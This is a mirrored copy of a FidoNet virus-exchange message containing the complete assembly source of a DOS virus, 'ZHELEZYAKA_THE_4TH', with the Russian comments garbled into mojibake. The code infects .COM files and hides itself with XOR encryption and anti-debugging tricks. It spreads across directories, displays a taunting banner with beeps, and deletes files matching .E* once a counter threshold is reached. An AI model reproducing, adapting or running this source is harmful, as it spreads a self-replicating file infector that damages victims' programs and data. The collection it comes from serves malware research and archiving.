mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
370 lines
8.3 KiB
NASM
370 lines
8.3 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
; Msg : 1 of 64
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59
|
|||
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : ViRii
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : ABC.PVT.HACK (ABC: <20><><EFBFBD><EFBFBD>...)
|
|||
|
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
|
|||
|
;* To : All
|
|||
|
;* Subj : ViRii
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>y<EFBFBD> <20><><EFBFBD>, All
|
|||
|
;
|
|||
|
;<3B><><EFBFBD> <20><>py<70> <20><><EFBFBD><EFBFBD>ᠫ, <20><>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD>, ᠬ <20><>ᠫ !
|
|||
|
;H<><48><EFBFBD><EFBFBD><EFBFBD> <20>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> 1:00-8:00
|
|||
|
;
|
|||
|
;PS: Hy <20><> <20><><EFBFBD><EFBFBD> <20> <20><>祬y <20><> ⠡y<E2A0A1><79><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
;
|
|||
|
;--------8<-------------------------------------------------------
|
|||
|
;
|
|||
|
;
|
|||
|
; ZHELEZYAKA_THE_4TH
|
|||
|
|
|||
|
IDEAL
|
|||
|
MODEL TINY
|
|||
|
CODESEG
|
|||
|
ORG 100H
|
|||
|
LOCALS
|
|||
|
MAIN_BEGIN: JMP VIRUS_START_O
|
|||
|
DB 04H,0,' ZHELEZYAKA_THE_4TH ',0
|
|||
|
|
|||
|
EXIT_ADDRESS EQU 100H
|
|||
|
DOS EQU 21H
|
|||
|
VIRUS_SIGNATURE EQU 04H
|
|||
|
NUM_FIRST_BYTES EQU 4
|
|||
|
ALREADY_INFECT EQU 3
|
|||
|
COUNTER_ADDR EQU 510H
|
|||
|
FALSE_BYTE_ADDR EQU 104H
|
|||
|
COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O)
|
|||
|
EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O)
|
|||
|
|
|||
|
WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O)
|
|||
|
ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES)
|
|||
|
NEW_DTA EQU (ORIGIN_DIR+65)
|
|||
|
COPY_BUFFER EQU (NEW_DTA+256)
|
|||
|
FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER)
|
|||
|
|
|||
|
ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O)
|
|||
|
MAIN_PART_LEN EQU (WRITE_BUFFER)
|
|||
|
INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O)
|
|||
|
XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O)
|
|||
|
XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O)
|
|||
|
XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O)
|
|||
|
XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O)
|
|||
|
XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O)
|
|||
|
XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O)
|
|||
|
XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O)
|
|||
|
BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O)
|
|||
|
CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O)
|
|||
|
MESSAGE EQU (MESSAGE_O-VIRUS_START_O)
|
|||
|
DOT EQU (DOT_O-VIRUS_START_O)
|
|||
|
|
|||
|
VIRUS_START_O: CALL DETECT_BEGIN_O
|
|||
|
XOR_VAL0_O DB 0
|
|||
|
DETECT_BEGIN_O: POP SI
|
|||
|
SUB SI,3 ; SI - <20>砫<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
JMP SHORT @@0
|
|||
|
XOR_VAL00_O DB 0
|
|||
|
@@0: LEA DI,[SI+BEGIN_CODING]
|
|||
|
CALL CODE
|
|||
|
BEGIN_CODING_O =$
|
|||
|
|
|||
|
MOV CX,NUM_FIRST_BYTES ; <20><>稬
|
|||
|
LEA DI,[SI+ORIGIN_BEGIN] ; 䠩<>
|
|||
|
MOV BX,100H ; <20>
|
|||
|
MOVE_LOOP: MOV AH,[DI] ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV [BX],AH ;
|
|||
|
INC DI ;
|
|||
|
INC BX ;
|
|||
|
LOOP MOVE_LOOP ;
|
|||
|
|
|||
|
LEA DX,[SI+NEW_DTA] ; <20>⠢<EFBFBD><E2A0A2>
|
|||
|
MOV AH,1AH ; <>
|
|||
|
CALL CHECK ; DTA
|
|||
|
|
|||
|
MOV AH,47H ;
|
|||
|
PUSH SI ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
LEA SI,[SI+ORIGIN_DIR+1] ; ⥪<>騩
|
|||
|
CWD ; <20><>⠫<EFBFBD><E2A0AB>
|
|||
|
CALL CHECK ;
|
|||
|
POP SI ;
|
|||
|
|
|||
|
FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><>ࢮ<EFBFBD><E0A2AE>
|
|||
|
XOR CX,CX ; COM 䠩<><E4A0A9>
|
|||
|
MOV AH,4EH ;
|
|||
|
FIND_NEXT: INT DOS ;
|
|||
|
JNC @@L1 ;
|
|||
|
JMP NO_FILES_FOUND ; <20> <20><><EFBFBD>, <20><> ...
|
|||
|
@@L1:
|
|||
|
LEA DX,[SI+NEW_DTA+1EH] ; <20><><EFBFBD><EFBFBD>
|
|||
|
MOV AX,3D02H ; <20><><EFBFBD><EFBFBD>
|
|||
|
CALL CHECK ; 䠩<>
|
|||
|
|
|||
|
|
|||
|
MOV BX,AX ; <20><><EFBFBD><EFBFBD><EFBFBD>⠥<EFBFBD>
|
|||
|
MOV AH,3FH ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 4
|
|||
|
LEA DX,[SI+ORIGIN_BEGIN] ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV DI,DX ; <20><>
|
|||
|
MOV CX,NUM_FIRST_BYTES ; <20>⮣<EFBFBD>
|
|||
|
INT DOS ; 䠩<><E4A0A9>
|
|||
|
ADD DI,NUM_FIRST_BYTES-1
|
|||
|
|
|||
|
CMP [BYTE PTR DI],VIRUS_SIGNATURE
|
|||
|
JE @@L2
|
|||
|
JMP INFECT_FILE
|
|||
|
@@L2:
|
|||
|
MOV AH,3EH ; <20><><EFBFBD><EFBFBD>
|
|||
|
CALL CHECK ; 䠩<>
|
|||
|
|
|||
|
CONT_SEARCHING: MOV AH,4FH ; <20><><EFBFBD><EFBFBD>
|
|||
|
JMP FIND_NEXT ; <><E1ABA5><EFBFBD>騩 䠩<>
|
|||
|
|
|||
|
COM_WILDCARD_O DB '*.COM',0
|
|||
|
EXE_WILDCARD_O DB '*.E*',0
|
|||
|
|
|||
|
MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$'
|
|||
|
DOT_O DB '..',0
|
|||
|
|
|||
|
NO_FILES_FOUND: MOV AH,3BH ; <20><><EFBFBD>頥<EFBFBD><E9A0A5><EFBFBD>
|
|||
|
LEA DX,[SI+DOT] ; <20><> <20><>⠫<EFBFBD><E2A0AB>
|
|||
|
INT DOS ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
JC @@L4 ; <20><><EFBFBD><EFBFBD>
|
|||
|
JMP FIND_FIRST ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
@@L4:
|
|||
|
XOR AX,AX ;
|
|||
|
MOV ES,AX ; <20><><EFBFBD><EFBFBD><EFBFBD>稢<EFBFBD><E7A8A2><EFBFBD>
|
|||
|
MOV DI,COUNTER_ADDR ; <20><><EFBFBD><EFBFBD>稪
|
|||
|
MOV AX,[ES:DI] ;
|
|||
|
|
|||
|
INC AL ;
|
|||
|
MOV [ES:DI],AX ; <20><><EFBFBD>
|
|||
|
CMP AL,ALREADY_INFECT ; <20>㤥<EFBFBD>
|
|||
|
JG INFECT_MORE ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?
|
|||
|
CMP AH,ALREADY_INFECT-2 ;
|
|||
|
JG BANNER ;
|
|||
|
JMP EXECUTE_PROG ;
|
|||
|
|
|||
|
BANNER: XOR AX,AX ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>稪<EFBFBD>
|
|||
|
MOV [ES:DI],AX
|
|||
|
|
|||
|
LEA DX,[SI+MESSAGE] ; <20>뢮<EFBFBD>
|
|||
|
MOV AH,9 ; ᮮ<>饭<EFBFBD><E9A5AD>
|
|||
|
CALL CHECK ;
|
|||
|
|
|||
|
MOV CX,5 ;
|
|||
|
CONTINUE_NOISE: MOV DL,7 ; <20><><EFBFBD><EFBFBD>
|
|||
|
MOV AH,2 ;
|
|||
|
INT DOS ;
|
|||
|
LOOP CONTINUE_NOISE
|
|||
|
JMP EXECUTE_PROG
|
|||
|
|
|||
|
INFECT_MORE: XOR AL,AL ; <20><><EFBFBD>࠭<EFBFBD><E0A0AD> <20><>ࢮ<EFBFBD><E0A2AE> .E* 䠩<><E4A0A9>
|
|||
|
INC AH
|
|||
|
MOV [ES:DI],AX
|
|||
|
|
|||
|
LEA DI,[SI+ORIGIN_DIR] ;
|
|||
|
MOV [BYTE PTR DI],'\' ; <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV AH,3BH ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
XCHG DX,DI ; <20><>⠫<EFBFBD><E2A0AB>
|
|||
|
INT DOS ;
|
|||
|
|
|||
|
LEA DX,[SI+EXE_WILDCARD]
|
|||
|
XOR CX,CX
|
|||
|
MOV AH,4EH
|
|||
|
INT DOS
|
|||
|
JC EXECUTE_PROG
|
|||
|
|
|||
|
LEA DX,[SI+NEW_DTA+1EH]
|
|||
|
MOV AH,41H
|
|||
|
INT 21H
|
|||
|
|
|||
|
EXECUTE_PROG: MOV DX,80H ; <20>⠢<EFBFBD><E2A0A2>
|
|||
|
MOV AH,1AH ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
INT DOS ; DTA
|
|||
|
|
|||
|
LEA DI,[SI+ORIGIN_DIR] ;
|
|||
|
MOV [BYTE PTR DI],'\' ; <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV AH,3BH ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
XCHG DX,DI ; <20><>⠫<EFBFBD><E2A0AB>
|
|||
|
INT DOS ;
|
|||
|
|
|||
|
MOV AX,DS
|
|||
|
MOV ES,AX
|
|||
|
MOV BP,100H ;
|
|||
|
JMP BP ;
|
|||
|
|
|||
|
INFECT_FILE:
|
|||
|
XOR AL,AL ;
|
|||
|
MOV AH,[BYTE PTR SI+XOR_VALUE] ;
|
|||
|
@@IFZERO: INC AH ;
|
|||
|
JZ @@IFZERO ; <20><><EFBFBD><EFBFBD><EFBFBD>⠢<EFBFBD><E2A0A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV [BYTE PTR SI+XOR_VALUE],AH ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV [SI+XOR_VAL0],AH ; <20><><EFBFBD>
|
|||
|
MOV [SI+XOR_VAL00],AH ;
|
|||
|
MOV [SI+XOR_VAL1],AH ;
|
|||
|
MOV [SI+XOR_VAL2],AH ;
|
|||
|
MOV [SI+XOR_VAL3],AH ;
|
|||
|
MOV [SI+XOR_VAL4],AH ;
|
|||
|
|
|||
|
MOV AX,5700H ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
CALL CHECK ; <20>६<EFBFBD>
|
|||
|
PUSH CX ; ᮧ<><E1AEA7><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
PUSH DX ;
|
|||
|
|
|||
|
XOR CX,CX ; <20><><EFBFBD><EFBFBD>
|
|||
|
XOR DX,DX ; <20><>
|
|||
|
MOV AX,4202H ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
CALL CHECK ; 䠩<><E4A0A9>
|
|||
|
|
|||
|
SUB AX,3 ; <20><><EFBFBD><EFBFBD><EFBFBD>⠢<EFBFBD><E2A0A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV [SI+WRITE_BUFFER+1],AX ; 4 <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE
|
|||
|
|
|||
|
MOV CX,MAIN_PART_LEN ;
|
|||
|
MOV DI,SI ; <20><><EFBFBD><EFBFBD><EFBFBD>㥬
|
|||
|
COPY_LOOP: MOV AH,[DI] ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV [DI+COPY_BUFFER],AH ; <20>
|
|||
|
INC DI ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
LOOP COPY_LOOP ;
|
|||
|
|
|||
|
LEA DI,[SI+COPY_BUFFER+BEGIN_CODING] ; <20><><EFBFBD><EFBFBD><EFBFBD>㥬
|
|||
|
CALL CODER_DECODER ; <20><><EFBFBD>
|
|||
|
|
|||
|
LEA DI,[SI+COPY_BUFFER+CONT_CODING]
|
|||
|
CALL FIRST_CODE
|
|||
|
|
|||
|
MOV CX,MAIN_PART_LEN ; <20><><EFBFBD><EFBFBD><EFBFBD>ࠥ<EFBFBD>
|
|||
|
MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
ADD AL,[FALSE_BYTES] ;
|
|||
|
XOR AH,AH ;
|
|||
|
ADD CX,AX ; <20><>襬
|
|||
|
LEA DX,[SI+COPY_BUFFER] ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV AH,40H ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
INT DOS ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
|
|||
|
XOR CX,CX ; <20><><EFBFBD><EFBFBD>
|
|||
|
XOR DX,DX ; <20><>
|
|||
|
MOV AX,4200H ; <20><>砫<EFBFBD>
|
|||
|
CALL CHECK ; 䠩<><E4A0A9>
|
|||
|
|
|||
|
MOV CX,NUM_FIRST_BYTES ; <20><><EFBFBD>ࠢ<EFBFBD>塞
|
|||
|
LEA DX,[SI+WRITE_BUFFER] ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
MOV AH,40H ; <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
INT DOS ; 䠩<><E4A0A9>
|
|||
|
|
|||
|
POP DX ; <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
POP CX ; <20>६<EFBFBD>
|
|||
|
MOV AX,5701H ; ᮧ<><E1AEA7><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
CALL CHECK ;
|
|||
|
|
|||
|
MOV AH,3EH ; <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0>
|
|||
|
INT DOS ; 䠩<>
|
|||
|
|
|||
|
CALL CODE_INT
|
|||
|
|
|||
|
JMP EXECUTE_PROG
|
|||
|
|
|||
|
ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H
|
|||
|
|
|||
|
CONT_CODING_O =$
|
|||
|
|
|||
|
CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1
|
|||
|
MOV AH,[SI+XOR_VALUE]
|
|||
|
XOR AL,AL
|
|||
|
OUT 21H,AL
|
|||
|
CODING_LOOP: IN AL,21H
|
|||
|
ADD AL,AH
|
|||
|
XOR [DI],AL ; <20><><EFBFBD>
|
|||
|
INC DI ; <20><><EFBFBD><EFBFBD>騪
|
|||
|
ADD AL,[FALSE_BYTE_ADDR]
|
|||
|
OUT 21H,AL ;
|
|||
|
LOOP CODING_LOOP ;
|
|||
|
XOR AL,AL
|
|||
|
OUT 21H,AL
|
|||
|
RET
|
|||
|
|
|||
|
CHECK: PUSH AX ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E0AEA2> <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD>
|
|||
|
PUSHF
|
|||
|
MOV AL,0FEH
|
|||
|
OUT 21H,AL
|
|||
|
MOV AH,4FH
|
|||
|
POPF
|
|||
|
POP AX
|
|||
|
INT 21H
|
|||
|
PUSH AX
|
|||
|
PUSHF
|
|||
|
IN AL,21H
|
|||
|
CMP AL,0FEH
|
|||
|
@@HALT: JNE @@HALT
|
|||
|
XOR AL,AL
|
|||
|
OUT 21H,AL
|
|||
|
POPF
|
|||
|
POP AX
|
|||
|
RET
|
|||
|
|
|||
|
CODE_INT: XOR AX,AX ; <20><><EFBFBD><EFBFBD><EFBFBD><E0AEA2><EFBFBD><EFBFBD> INT 0 - 3
|
|||
|
MOV ES,AX
|
|||
|
MOV CX,12
|
|||
|
COD_INT_CON: MOV BX,CX
|
|||
|
XOR [BYTE PTR ES:BX],10101010B
|
|||
|
LOOP COD_INT_CON
|
|||
|
PUSH CS
|
|||
|
POP ES
|
|||
|
RET
|
|||
|
; ------------
|
|||
|
FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; <20>।<EFBFBD><E0A5A4><EFBFBD><EFBFBD>⥫<EFBFBD><E2A5AB><EFBFBD><EFBFBD>
|
|||
|
MOV AH,[SI+XOR_VALUE] ; <20><><EFBFBD><EFBFBD>騪
|
|||
|
JMP SHORT FIRST_COD_LOOP
|
|||
|
XOR_VAL1_O DB 0
|
|||
|
FIRST_COD_LOOP: XOR [DI],AH
|
|||
|
INC DI
|
|||
|
JMP SHORT @@2
|
|||
|
XOR_VAL2_O DB 0
|
|||
|
@@2: LOOP FIRST_COD_LOOP
|
|||
|
RET
|
|||
|
|
|||
|
XOR_VALUE_O DB 0
|
|||
|
|
|||
|
CODE: PUSH DI
|
|||
|
LEA DI,[SI+CONT_CODING]
|
|||
|
JMP @@3
|
|||
|
XOR_VAL3_O DB 0
|
|||
|
@@3: CALL FIRST_CODE
|
|||
|
MOV AH,40H
|
|||
|
JMP @@4
|
|||
|
XOR_VAL4_O DB 0
|
|||
|
@@4: CALL CHECK ; <20>⮡<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>墠<EFBFBD>稪
|
|||
|
CALL CODE_INT
|
|||
|
POP DI
|
|||
|
JMP SHORT CODER_DECODER
|
|||
|
|
|||
|
WRITE_BUFFER_O =$
|
|||
|
END MAIN_BEGIN
|
|||
|
|
|||
|
;---------------8<-------------------------------------------------
|
|||
|
;
|
|||
|
;- <20><><EFBFBD> <20><><EFBFBD> <20>뫮 <20><> <20>p<EFBFBD><70><EFBFBD><EFBFBD>쭮, <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20>뫮 ⠪ <20><><EFBFBD>쭮.
|
|||
|
;
|
|||
|
; -= iR0NMAN =-
|
|||
|
;
|
|||
|
;-+- GoldED 2.50.B1016+
|
|||
|
; + Origin: <20><>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD> - <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48> !!! (123:1000/6.2)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/p Check for code segment overrides in protected mode
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|